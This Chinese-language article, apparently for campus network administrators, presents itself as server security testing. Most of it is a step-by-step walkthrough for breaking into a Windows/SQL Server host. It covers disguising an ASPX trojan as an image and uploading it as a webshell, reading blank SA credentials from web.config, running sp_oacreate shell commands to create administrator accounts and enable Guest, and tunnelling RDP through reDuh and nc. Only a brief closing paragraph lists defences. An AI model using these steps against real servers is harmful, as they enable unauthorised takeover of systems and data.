張晶

摘要：隨著校園網(wǎng)絡(luò)的普及，很多學(xué)校都建立了自己的校園網(wǎng)站，并擁有自己的服務(wù)器。然而管理方面的疏忽以及服務(wù)器本身的漏洞，往往使校園網(wǎng)站成為黑客的眼中釘。本文通過(guò)對(duì)黑客入侵服務(wù)器過(guò)程的詳細(xì)闡述，逐一揭示網(wǎng)站管理員應(yīng)做卻往往忽視的防范措施，以達(dá)到對(duì)服務(wù)器進(jìn)行安全問(wèn)題檢測(cè)的目的。

關(guān)鍵詞：程序后臺(tái)；木馬；提權(quán)；映射端口；遠(yuǎn)程登錄

現(xiàn)在許多Windows2000/2003/2008服務(wù)器都或多或少的存在安全問(wèn)題，不是系統(tǒng)軟件存在漏洞，就是網(wǎng)站程序上傳出現(xiàn)漏洞，再加上網(wǎng)站管理員往往忽視了一些有效的防御手段，這都會(huì)使網(wǎng)站在黑客面前不堪一擊，他們可以在網(wǎng)站管理員毫無(wú)覺(jué)察的情況下，任意提權(quán)，上傳木馬，并下載其中的程序，從而使整個(gè)服務(wù)器的運(yùn)行出現(xiàn)問(wèn)題。

如今，校園網(wǎng)服務(wù)器的安全，關(guān)系到整個(gè)學(xué)校日常工作的正常運(yùn)行，一旦被侵入，后果不堪設(shè)想，而此類事故的產(chǎn)生必有隱患，那么就讓我們的管理員行駛“綠客”的職責(zé)，在與黑客“賽跑”的過(guò)程中，提前一步對(duì)服務(wù)器進(jìn)行檢測(cè)，避免以上種種問(wèn)題的發(fā)生，為您所管理的服務(wù)器打上一針強(qiáng)心劑。

● 檢測(cè)的環(huán)境及工具

◇準(zhǔn)備一臺(tái)服務(wù)器，如Windows Server 2003 sp2 SQL2000/2005/2008系統(tǒng)。

◇準(zhǔn)備木馬工具：ASP木馬、ASPX木馬、PHP木馬，Mstsc.exe遠(yuǎn)程登錄工具，JAVA語(yǔ)言環(huán)境、NC.exe、內(nèi)網(wǎng)滲透利器——reDuh。

● 服務(wù)器檢測(cè)實(shí)戰(zhàn)演練

1.上傳木馬

服務(wù)器里一般都安裝了網(wǎng)站程序ASP(aspx.net)+SQL、PHP+MYSQL等，并且都提供后臺(tái)演示或注冊(cè)上傳功能，這樣我們就可以通過(guò)網(wǎng)站程序的后臺(tái)進(jìn)行上傳木馬或者提權(quán)。

ASPX圖片木馬就是小圖片加上aspx木馬程序生成的文件，看起來(lái)是圖片，執(zhí)行時(shí)是木馬，上傳時(shí)能逃過(guò)文件檢測(cè)判定。在Windows下的DOS窗口，鍵入copy1.jpg/b+ 2.aspx/a2.jpg，便可以制作木馬圖片。然后，我們根據(jù)程序網(wǎng)站提供的后臺(tái)演示，上傳圖片木馬，進(jìn)入木馬程序界面，從圖1中可見，該服務(wù)器的管理員并沒(méi)有進(jìn)行妥善管理，沒(méi)有在aspx.net程序目錄以及ASPX中寫權(quán)限防止上傳圖片木馬。

2.通過(guò)木馬程序進(jìn)行提權(quán)

接下來(lái)，我們查看SQL用戶，有些網(wǎng)站管理員直接給SQL超級(jí)用戶（SA）的口令，卻沒(méi)有設(shè)置密碼進(jìn)行保護(hù)，這也使得服務(wù)器較容易遭到病毒或木馬的攻擊。通過(guò)圖1中的Webshell，我們可以上傳其他木馬方便我們對(duì)SQL提權(quán)（如圖2），進(jìn)而通過(guò)SQL提升自己的管理權(quán)限。

3.破解用戶與口令

本地SQL服務(wù)器是我們要遠(yuǎn)程連接到的SQL服務(wù)器，但想要實(shí)現(xiàn)遠(yuǎn)程連接，必先知道其用戶與口令。有的網(wǎng)站程序的用戶與口令，就是SQL的超級(jí)用戶（SA）及口令，這只能說(shuō)明管理員極其不小心或者學(xué)藝不精，于是,我們通過(guò)木馬程序編輯功能查詢aspx.net網(wǎng)站程序的web.config這個(gè)配置文件，可以查到SQL數(shù)據(jù)庫(kù)用戶名與密碼：uid=sa;pwd=，即用戶為SA，密碼為空。

4.通過(guò)查詢分析器提權(quán)

然后，我們通過(guò)本地SQL連接到遠(yuǎn)程服務(wù)器，并通過(guò)查詢分析器提權(quán)。

（1）連接數(shù)據(jù)庫(kù)。

driver={SQL Server}；server=服務(wù)器IP；uid=用戶名；pwd=密碼；database=數(shù)據(jù)庫(kù)名

（2）添加新用戶。

declare@shell int exec sp_oacreate 'wscript.shell'，@shell output exec sp_oamethod @shell，'run'，null，'c:windowssystem32cmd.exe /c net user 新用戶 密碼 /add'

（3）把用戶加到管理組。

declare @shell int exec sp_oacreate 'wscript.shell'，@shell output exec sp_oamethod@shell，'run'，null，'c:windowssystem32cmd.exe /c net localgroup administrators 新用戶 /add'

（4）激活GUEST用戶。

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell，'run'，null，'c:windowssystem32cmd.exe /c net user guest /active:yes'

（5）把Guest加到管理組。

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell，'run'，null，'c:windowssystem32cmd.exe /c net localgroup Administrators Guest /add'

進(jìn)行上面一系列的提權(quán)后，生成管理用戶與口令，進(jìn)行遠(yuǎn)程登錄服務(wù)器。

5.內(nèi)網(wǎng)滲透利器的遠(yuǎn)程執(zhí)行

根據(jù)我們上傳的木馬進(jìn)行操作，上傳為我們服務(wù)的其他木馬，通過(guò)木馬上傳的內(nèi)網(wǎng)滲透利器在服務(wù)器上遠(yuǎn)程執(zhí)行，但不要關(guān)閉（如圖3）。

6.本地與遠(yuǎn)程架橋

用服務(wù)器上的木馬與本地“JAVA語(yǔ)言+NC”進(jìn)行連接，架設(shè)一橋，映射端口，偽裝成一個(gè)局域網(wǎng)，因?yàn)檫h(yuǎn)程服務(wù)器只能在本地運(yùn)行，我們可以采用127.0.0.1這個(gè)地址遠(yuǎn)程登錄，進(jìn)入服務(wù)器，內(nèi)網(wǎng)的服務(wù)器也是通過(guò)這種方法進(jìn)行檢測(cè)（如上頁(yè)圖4）。

（1）在本地DOS窗口下運(yùn)行JAVA語(yǔ)言連接遠(yuǎn)程服務(wù)器上的木馬，打開遠(yuǎn)程服務(wù)器在本地1010端口。注意這個(gè)不能關(guān)閉。

DOS下命令：java -jar reduhclient.jar http://....../ reDuh.aspx

（2）新開一個(gè)命令行，用NC連接本機(jī)1010端口。

DOS命令窗口輸入命令：nc -vv localhost 1010（如上頁(yè)圖5）。

在DOS命令窗口輸入命令：[createTunnel]1234:127.0.0.1:3389，連接遠(yuǎn)程服務(wù)器3389端口。

（3）最后本機(jī)窗口有三個(gè)，一個(gè)是遠(yuǎn)程服務(wù)木馬，另兩個(gè)是本地木馬映射連接端口(如圖6)。

7.進(jìn)入遠(yuǎn)程服務(wù)器

在本地用mstsc.exe遠(yuǎn)程登錄程序，進(jìn)入遠(yuǎn)程服務(wù)器。用戶口令以Sys_guest為例。這樣我們就控制了整個(gè)服務(wù)器（如圖7、圖8）。（本方法在客戶端Windows server 2003 sp2+SQL2000+JAVA，服務(wù)器Windows server 2003/2008+sql2000/2005+aspx環(huán)境下測(cè)試通過(guò)）。

通過(guò)模擬黑客侵入服務(wù)器的過(guò)程，我們發(fā)現(xiàn)一般服務(wù)器需要關(guān)閉一些網(wǎng)站目錄、寫權(quán)限、增加一些目錄執(zhí)行ASPX程序運(yùn)行、網(wǎng)站跨站權(quán)限漏洞。同時(shí)，SQL服務(wù)器要及時(shí)升級(jí)，刪除一些不必要的限制，SQL超級(jí)權(quán)限不能輕易授權(quán)，以及網(wǎng)站程序上傳漏洞、編輯器的漏洞，還需要通過(guò)升級(jí)編輯器等操作來(lái)完善，管理員也要學(xué)會(huì)一些網(wǎng)站安全防范措施，如遠(yuǎn)程用戶進(jìn)入服務(wù)器時(shí)，可以聯(lián)動(dòng)報(bào)警發(fā)短信通知等功能。

本文參考網(wǎng)站：http://www.sensepost.com/labs/tools/pentest/reduh，同時(shí)感謝網(wǎng)友exin對(duì)本文提供幫助。